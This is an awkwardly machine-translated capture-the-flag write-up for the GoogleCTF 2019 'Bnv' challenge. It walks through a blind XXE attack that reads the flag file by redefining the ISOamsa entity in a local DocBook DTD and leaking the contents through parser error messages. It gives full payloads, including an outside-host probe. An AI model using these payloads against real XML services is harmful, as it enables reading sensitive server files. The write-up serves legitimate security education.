[GoogleCTF2019 Quals]Bnv -S

Examination site ： adopt xml The path of the parameter entity of is wrong to read sensitive information

Knowledge point 1： Reference resources

This article enumerates files , We found that different systems may contain dtd file .
for example linux Possible /usr/share/yelp/dtd/docbookx.dtd
And it's time to dtd There is a reference to ISOamsa Parameter entity , So we can define ISOamsa The content of .

Problem. ：

1. Turn on bp, Click on submit Grab the bag .

2. Found through json Format transfer message Parameters , Try using... Here xml Format transfer data , If you can , You can consider using it xxe The attack .

structure xml:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE message [
<!ELEMENT message ANY >
<!ENTITY test "135601360123502401401250">
]>
<message>&test;</message>

The server successfully parsed , Next, let's see if we can connect to the Internet ：

test xml:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE message [
<!ELEMENT message ANY >
<!ENTITY test "135601360123502401401250">
<!ENTITY % a SYSTEM "https://bbbbb.free.beeceptor.com">
%a;
]>
<message>&test;</message>

'https://bbbbb.free.beeceptor.com' Is in Beeceptor A domain name for testing obtained on , Access logs can be recorded . stay Beeceptor No connected logs were found on , Therefore, it is unable to connect to the external network . It's impossible to get through http The protocol brings out the read information .

The test references locally existing files ：

  The test references a file that does not exist locally ：

You can see that the results returned are different , Returns... When the file exists internal error, This feature can be used to test flag Storage location of , When referencing file:///flag When to return to internal error, therefore flag In the root directory .

The next step is to read flag,flag have access to file Protocol read , But because the page has no echo and can not communicate with others , We can't see what is being read , The next step is to solve the problem of how to display the read content .

Notice that the wrong path is returned when the path is wrong , It reminds me of sql Error injection of , If you put file Information read by the protocol
Whether it can be spliced into the path can be displayed through an error message ？

give paylaod:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE message [
<!ELEMENT message ANY >
<!ENTITY m "135601360123502401401250">
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamsa '
<!ENTITY % flag SYSTEM "file:///flag">
<!ENTITY % getflag "<!ENTITY % test SYSTEM 'file:///%flag;'>">
'>
%local_dtd;%getflag;%test;
]>
<message>&m;</message>

  In entity %,' ,& Conduct unicode Code to prevent error ：

% => &#37                    ' => &#39                & => &#38

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE message [
<!ELEMENT message ANY >
<!ENTITY m "135601360123502401401250">
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamsa '
<!ENTITY &#37; flag SYSTEM "file:///flag">
<!ENTITY &#37; getflag "<!ENTITY &#38;#37; test SYSTEM &#39;file:///&#37;flag;&#39;>">
'>
%local_dtd;%getflag;%test;
]>
<message>&m;</message>

%local_dtd;%getflag;%test; Analytic process ：

1. The initial state 
<!ENTITY % ISOamsa '
<!ENTITY &#37; flag SYSTEM "file:///flag">
<!ENTITY &#37; getflag "<!ENTITY &#38;#37; test SYSTEM &#39;file:///&#37;flag;&#39;>">
'>
%local_dtd;%getflag;%test;

2. analysis %local_dtd;
<!ENTITY % flag SYSTEM "file:///flag">
<!ENTITY % getflag "<!ENTITY %#37; test SYSTEM 'file:///&#37;flag;'>">
%getflag;%test;

3. analysis %getflag;
<!ENTITY % flag SYSTEM "file:///flag">
<!ENTITY % test SYSTEM 'file:///%flag;'>
%test;

4. analysis %test;
 here flag Will be spliced into test In the path of , And read the path , Then there is the error report , We can see from the error reporting path flag